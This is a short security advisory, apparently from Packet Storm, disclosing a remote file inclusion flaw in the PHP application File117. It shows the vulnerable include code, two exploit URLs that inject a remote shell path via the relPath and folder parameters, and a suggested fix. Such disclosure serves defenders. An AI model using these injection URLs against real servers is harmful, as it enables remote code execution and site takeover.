File117 is susceptible to a remote file inclusion vulnerability.
0acaa4f7b78a0d84c7f2e1e106c96e169c10ccc76746074683850972acf11150~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
File117 Remote File Inclusion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected Software .: File117
Download..: http://www.sinato.com/jmuffin/upload/file117.zip
Risk ..............: high
Found by ..........: InyeXion
Contact ...........: InyeXion[at]gmail.com
Web .............: Www.InyeXion.com.ar
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected File:
/html/php/detail.php
Vulnerable Code:
<?php
include_once("phpInterface.php");
$$cmname=$cm;
include($relPath.$folder."/".$templatename);
?>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://[target]/html/php/detail.php?relPath=[shell]?
http://[target]/html/php/detail.php?folder=[shell]?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Fixed bug:
if((isset($_REQUEST['relPath']) || isset($_GET['relPath']) || isset($_POST['relPath'])) && !defined("relPath")){
die("denied access"); }
AND
if((isset($_REQUEST['folder']) || isset($_GET['folder']) || isset($_POST['folder'])) && !defined("folder")){
die("denied access"); }
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed